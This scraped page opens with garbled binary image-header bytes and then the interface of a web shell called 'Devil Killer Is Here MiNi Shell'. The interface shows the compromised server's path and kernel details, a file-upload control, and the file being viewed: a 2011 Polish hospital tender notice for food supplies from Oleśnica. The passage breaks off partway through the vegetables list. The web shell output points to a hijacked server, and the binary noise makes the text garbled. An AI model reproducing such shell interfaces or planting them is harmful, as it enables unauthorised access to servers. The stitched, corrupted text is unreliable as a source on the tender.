JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110513/111996-N-2011.html

<p class="kh_header"><b>Oleśnica: Dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy</b><br>
<b>Numer ogłoszenia: 111996 - 2011; data zamieszczenia: 13.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy.

Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 2-10 do SIWZ.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - Mięso, podroby i wędliny drobiowe
Pakiet nr 2 - Mięso wieprzowe i wołowe
Pakiet nr 3 - Artykuły spożywcze
Pakiet nr 4 - Nabiał
Pakiet nr 5 - Warzywa i owoce
Pakiet nr 6 - Ziemniaki
Pakiet nr 7 - Pieczywo
Pakiet nr 8 - Jajka
Pakiet nr 9 - Ryby mrożone.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8, 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 03.22.22.20-1, 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9, 03.14.25.00-3, 15.22.00.00-6, 15.11.00.00-2, 15.11.10.00-9, 15.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  wypełniony formularz asortymentowo-cenowy (odpowiednio załączniki nr 2-10 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
c) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy
d) oświadczenie, iż  Wykonawca dysponuje środkiem transportu, spełniającym wymagania określone  w Rozporządzeniu Ministra Zdrowia z dnia 19 grudnia 2002 r, w sprawie  wymagań sanitarnych dotyczących środków transportu żywności substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (Dz.U. z 2003 r. nr 21 poz. 179) - (załącznik nr 14 do SIWZ)
e) oświadczenie o spełnianiu wymagań określonych w ustawie  z dnia 11 maja 2001 r. o warunkach  zdrowotnych żywności i żywienia ( DZ.U. Nr 63 poz.634 ze zmianami), w szczególności podleganiu stałemu nadzorowi właściwego miejscowo organu Inspekcji Sanitarnej lub Weterynaryjnej (załącznik nr 15 do SIWZ)
f) oświadczenie, iż zaoferowane artykuły są wyprodukowane zgodnie z Polską Normą (załącznik nr 16 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1 
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 09:00, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1 
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Mięso, podroby i wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania jakościowe dla wędlin drobiowych:
1. Wygląd ogólny: Kształt uzależniony od mięśnia użytej osłonki, siatki formującej lub sposobu wiązania, powierzchnia czysta, sucha, dla wędzonych, gotowanych lekko wilgotna. 
2. Struktura i konsystencja: Struktura plastra o grubości 3 mm, dość ścisła, dopuszcza się nieznaczne rozdzielenie plastra w miejscach łączenia mięśni, konsystencja soczysta, krucha, powierzchnia przekroju lekko wilgotna, niedopuszczalne skupisko galarety na przekroju oraz wyciek soku
3. Barwa: Charakterystyczna dla danego asortymentu uzależniona od obróbki cieplnej lub jej braku. Niedopuszczalna nietypowa barwa mięśni na przekroju
4. Smak i zapach: Charakterystyczny dla danego asortymentu, niedopuszczalny smak i zapach świadczący o zepsuciu.

Opis asortymentu:
1. Kiełbasa podwawelska lub równoważna
Ilość na 12 m-cy: 320 kg
Folia hermetycznie pakowana
2. Kiełbasa zwyczajna
Ilość na 12 m-cy: 320 kg
Folia hermetycznie pakowana
3. Parówka typu hot-dog
Ilość na 12 m-cy: 600 kg
Folia hermetycznie pakowana (1szt.=60g)
4. Mortadela z pieczarkami
Ilość na 12 m-cy: 130 kg
Osłonka foliowa
5. Kiełbasa rodzinna lub równoważna
Ilość na 12 m-cy: 180 kg
Osłonka foliowa
6. Kiełbasa zielonogórska lub równoważna
Ilość na 12 m-cy: 180 kg
Osłonka foliowa
7. Polędwica luksusowa lub równoważna
Ilość na 12 m-cy: 180 kg
Osłonka foliowa
8. Polędwica z udźcem
Ilość na 12 m-cy: 180 kg
Osłonka foliowa
9. Szynka gotowana
Ilość na 12 m-cy: 180 kg
Osłonka foliowa
10. Krakowska parzona lub równoważna
Ilość na 12 m-cy: 170 kg
Osłonka foliowa
11. Boczek wędzony
Ilość na 12 m-cy: 60 kg	
Opakowanie hermetyczne
12. Żołądki drobiowe
Ilość na 12 m-cy: 200 kg
Opakowanie hermetyczne 1 kg
13. Wątroba drobiowa z indyka
Ilość na 12 m-cy: 350 kg
Opakowanie hermetyczne 1 kg
14. Kurczak
Ilość na 12 m-cy: 1500kg
Pojemnik 
15. Filet z indyka
Ilość na 12 m-cy: 300 kg
Pojemnik 
16. Filet z kurczaka
Ilość na 12 m-cy: 300 kg
Pojemnik 
17. Mięso gulaszowe I klasa
Ilość na 12 m-cy: 500 kg
Opakowanie hermetyczne 1 kg
18. Mięso gulaszowe II klasa
Ilość na 12 m-cy: 500 kg
Opakowanie hermetyczne 1 kg
19. Mięso gulaszowe z indyka extra
Ilość na 12 m-cy: 500 kg
Opakowanie hermetyczne 1 kg
20. Konserwa wielkopolska lub równoważna
Ilość na 12 m-cy: 240 kg
Foremka aluminiowa
21. Indyk na zimno
Ilość na 12 m-cy: 150 kg
Osłonka foliowa
22. Klops pieczony
Ilość na 12 m-cy: 250 kg
Foremka aluminiowa
23. Szynka zbójnicka lub równoważna
Ilość na 12 m-cy: 150 kg
Osłonka foliowa
24. Udko z kurczaka
Ilość na 12 m-cy: 650 kg
Pojemnik.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.40.00-0, 15.13.11.35-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Mięso wieprzowe i wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagania jakościowe dla wędlin drobiowych:
1. Obróbka: powierzchnia cięć gładka bez luźnych strzępów mięśni i tłuszczu. Na przekrojach nie może występować krew, przekrwienia powierzchniowe powinny być ścięte płasko.
2. Powierzchnia: powierzchnia skóry i tkanki łącznej sucha, dopuszczalna lekko wilgotna, niedopuszczalna powierzchnia mokra, oślizła lub spleśniała.
3. Czystość: brak śladów jakichkolwiek zanieczyszczeń.
4. Barwa: naturalna dla danego rodzaju mięsa, niedopuszczalny odcień szary lub zielonkawy.
5. Konsystencja: jędrna, elastyczna.
6. Zapach: swoisty, charakterystyczny dla danego mięsa. Niedopuszczalny zapach zaparzenia, psucia, moczowy bądź inny obcy.
7. Temperatura: dla mięsa świeżego od 0 do 4 stopni mierzone wewnątrz elementu.

Opis asortymentu:
1. Smalec
Ilość na 12 m-cy: 200 kg
Kostka 0,20 kg w pergaminie
2. Kości zwykłe
Ilość na 12 m-cy: 4000 kg
Pojemnik
3. Karkówka b/k
Ilość na 12 m-cy: 500 kg
Pojemnik
4. Mięso gulaszowe wieprzowe extra
Ilość na 12 m-cy: 600 kg
Opakowanie hermetyczne 1 kg
5. Mięso gulaszowe wołowe extra
Ilość na 12 m-cy: 700 kg
Opakowanie hermetyczne 1 kg
6. Wołowina pieczeń b/k
Ilość na 12 m-cy: 100 kg
Opakowanie hermetyczne
7. Łopatka b/k
Ilość na 12 m-cy: 250 kg
Pojemnik
8. Schab b/k
Ilość na 12 m-cy: 50 kg
Pojemnik.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Budyń z cukrem
Ilość na 12 m-cy: 1800 torebek po 60 g
Torebka 60 g
2. Cukier kryształ
Ilość na 12 m-cy: 2500 torebek po 1 kg
Torebka 1 kg
3. Cukier waniliowy
Ilość na 12 m-cy: 200 torebek po 32 g
Torebka 32 g
4. Herbata granulowana	
Ilość na 12 m-cy: 800 torebek po 100 g
Torebka 100 g
5. Marmolada twarda
Ilość na 12 m-cy: 600 opakowań po 500 g
Opakowanie 500 g
6. Groszek konserwowy puszka
Ilość na 12 m-cy: 400 puszek po 375 g
Puszka 375 g
7. Kucharek lub produkt równoważny
Ilość na 12 m-cy: 360 torebek po 200 g
Torebka 200 g
8. Kasza jęczmienna
Ilość na 12 m-cy: 1000 torebek po 1 kg
Torebka 1 kg
9. Kasza manna
Ilość na 12 m-cy: 600 torebek po 1 kg
Torebka 1 kg
10. Koncentrat pomidorowy 30% duży
Ilość na 12 m-cy: 240 słoików po 900 g
Słoik 900 g
11. Koncentrat pomidorowy 30% mały
Ilość na 12 m-cy: 400 słoików po 165 g
Słoik 165 g
12. Koncentrat barszczu czerwonego w płynie
Ilość na 12 m-cy: 300 słoików po 190 ml
Ilość na 12 m-cy: Słoik 190 ml
13. Kawa zbożowa typu Kujawianka
Ilość na 12 m-cy: 600 torebek po 500 g
Torebka 500 g
14. Kwasek cytrynowy
Ilość na 12 m-cy: 400 torebek po 30 g
Torebka 30 g
15. Kompot (asortyment: wiśnia, truskawka, czarna porzeczka)
Ilość na 12 m-cy: 500 słoików po 900 ml
Słoik 900 ml
16. Kleik ryżowy
Ilość na 12 m-cy: 300 torebek po 180 g
Torebka 180 g
17. Konserwa rybna makrela w pomidorach
Ilość na 12 m-cy: 1000 puszek po 310 g
Puszka 310 g
18. Kisiel z cukrem
Ilość na 12 m-cy: 7000 torebek po 77 g
Torebka 77 g
19. Kapusta czerwona konserwowa 0,9 l
Ilość na 12 m-cy: 500 słoików po 900 g
Słoik 900 g
20. Kakao
Ilość na 12 m-cy: 120 opakowań po 200 g
Opakowanie 200 g
21. Makaron asortyment (kolanko, nitka, łazanki, świderki)
Ilość na 12 m-cy: 2000 opakowań po 500 g
Opakowanie 500 g
22. Mąka pszenna typ 500
Ilość na 12 m-cy: 2000 torebek po 1 kg
Torebka 1 kg
23. Mąka ziemniaczana
Ilość na 12 m-cy: 200 torebek po 1 kg
Torebka 1 kg
24. Musztarda
Ilość na 12 m-cy: 120 słoików po 200 g
Słoik 200 g
25. Masło roślinne
Ilość na 12 m-cy: 1000 opakowań po 500 g
Opakowanie 500 g
26. Majonez
Ilość na 12 m-cy: 250 słoików po 730 g
Słoik 730 g
27. Majonez
Ilość na 12 m-cy: 200 słoików po 260 g
Słoik 260 g
28. Przyprawa w płynie typu Magii
Ilość na 12 m-cy: 250 butelek po 1 l
Butelka 1 l
29. Majeranek
Ilość na 12 m-cy: 120 torebek po 20 g
Torebka 20 g
30. Ocet spirytusowy 10%
Ilość na 12 m-cy: 200 butelek po 0,5 l
Butelka 0,5 l
31. Ogórek konserwowy
Ilość na 12 m-cy: 800 słoików po 0,9 l
Słoik 0,9 l
32. Olej 
Ilość na 12 m-cy: 300 butelek po 1 l
Butelka 1 l
33. Liść laurowy
Ilość na 12 m-cy: 120 torebek po 20 g
Torebka 20 g
34. Pieprz
Ilość na 12 m-cy: 400 torebek po 20 g
Torebka 20 g
35. Pasztet drobiowy typu Drop
Ilość na 12 m-cy: 3700 puszek po 160 g
Puszka 160 g
36. Płatki owsiane
Ilość na 12 m-cy: 400 torebek po 500 g
Torebka 500 g
37. Przecier ogórkowy
Ilość na 12 m-cy: 400 słoików po 300 g
Słoik 300 g
38. Ryż
Ilość na 12 m-cy: 1100 torebek po 1 kg
Torebka 1 kg
39. Sól
Ilość na 12 m-cy: 800 torebek po 1 kg
Torebka 1 kg
40. Sos pieczeniowy
Ilość na 12 m-cy: 150 torebek po 30 g
Torebka 30 g
41. Suchary z cukrem
Ilość na 12 m-cy: 600 opakowań po 290 g
Opakowanie 290 g
42. Suchary bez cukru
Ilość na 12 m-cy: 100 opakowań po 290 g
Opakowanie 290 g
43. Syrop owocowy (asortyment: wiśniowy, malinowy, żurawinowy)
Ilość na 12 m-cy: 1400 butelek po 490 ml
Butelka 490 ml
44. Szczaw konserwowy
Ilość na 12 m-cy: 200 słoików po 300 g
Słoik 300 g
45. Żelatyna
Ilość na 12 m-cy: 400 torebek po 30 g
Torebka 30 g
46. Mrożonka - fasolka szparagowa cięta
Ilość na 12 m-cy: 150 opakowań po 2,5 kg
Opakowanie 2,5 kg
47. Mrożonka - szpinak
Ilość na 12 m-cy: 150 opakowań po 2,5 kg
Opakowanie 2,5 kg
48. Ziele angielskie
Ilość na 12 m-cy: 120 torebek po 20 g
Torebka 20 g
49. Wafle w czekoladzie
Ilość na 12 m-cy: 450 szt. wafli
1szt. =39g
50. Wafle ryżowe
Ilość na 12 m-cy: 5 opakowań po 400 g
Opakowanie 400g
51. Sok marchwiowo-owocowy
Ilość na 12 m-cy: 450 szt. po 300 ml
1szt.=300ml
52. Zupki marchwiowo-ryżowe od 5 miesiąca życia
Ilość na 12 m-cy: 80 szt. słoiczków po 130 g
Słoiczek 130 g
53. Tuńczyk w sosie własnym	
Ilość na 12 m-cy: 2000 puszek po 170 g
Puszka 170 g
54. Papryka czerwona słodka - przyprawa	
Ilość na 12 m-cy: 60 opakowań po 25 g
Opakowanie 25 g
55. Bazylia - przyprawa
Ilość na 12 m-cy: 60 opakowań po 25 g
Opakowanie 25 g
56. Przyprawa do kurczaka
Ilość na 12 m-cy: 60 opakowań po 25 g
Opakowanie 25 g
57. Przyprawa do grilla
Ilość na 12 m-cy: 60 opakowań po 25 g
Opakowanie 25 g
58. Oregano - przyprawa
Ilość na 12 m-cy: 60 opakowań po 25 g
Opakowanie 25 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mleko pasteryzowane 1,5%
ilość na 12 m-cy: 42000 l
Worek foliowy 5 l
2. Ser żółty twardy
ilość na 12 m-cy: 150 kg
Typu salami, opakowanie 2 kg
3. Ser biały (twaróg półtłusty)
ilość na 12 m-cy: 2700 kg
Pakowany w pergamin po 1 kg
4. Śmietana słodka zawartość tłuszczu 15%
ilość na 12 m-cy: 1200 l
Worek foliowy 0,5 litra
5. Ser topiony
ilość na 12 m-cy: 150 kg
Opakowanie zbiorcze 10 sztuk x 100 g 
6. Jogurty smakowe, wieloowocowe
ilość na 12 m-cy: 3000 Szt.
kubek 125 ml, widoczne kawałki owoców, zawartość tłuszczu 2%
7. Masło typu ekstra
ilość na 12 m-cy: 1500 kg
Kostka 200-250 g (80-90% tłuszczu)
8. Śmietana kwaśna 12%
ilość na 12 m-cy: 550 Szt.
Kubek 380-450 g 
9. Jogurt naturalny
ilość na 12 m-cy: 400 Szt.
kubek 125 ml, zawartość tłuszczu 2%
10. Margaryna
ilość na 12 m-cy: 450 kg
Kostka 200-250 g (80% tłuszczu).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Burak czerwony
ilość na 12 m-cy: 2400 kg
Worek 10 kg
2. Cebula
ilość na 12 m-cy: 200 kg
Worek 5 kg	kg
3. Czosnek
ilość na 12 m-cy: 6 kg
Worek 1 kg
4. Fasola Jaś
ilość na 12 m-cy: 140 kg
Woreczek 400 g
5. Jabłka
ilość na 12 m-cy: 1000 kg
Skrzynka 15 kg, jabłko o wadze 100g szt.
6. Kapusta biała
ilość na 12 m-cy: 1600 kg
Worek 25 kg
7. Kapusta czerwona
ilość na 12 m-cy: 400 kg
Worek 25 kg
8. Kapusta kiszona
ilość na 12 m-cy: 500 kg
Woreczek foliowy 1 kg
9. Kalafior - sezon
ilość na 12 m-cy: 600 szt.
Skrzynka 10 szt.
10. Koper
ilość na 12 m-cy: 1200 pęczków
Pęczki po 10 szt.
11. Marchew
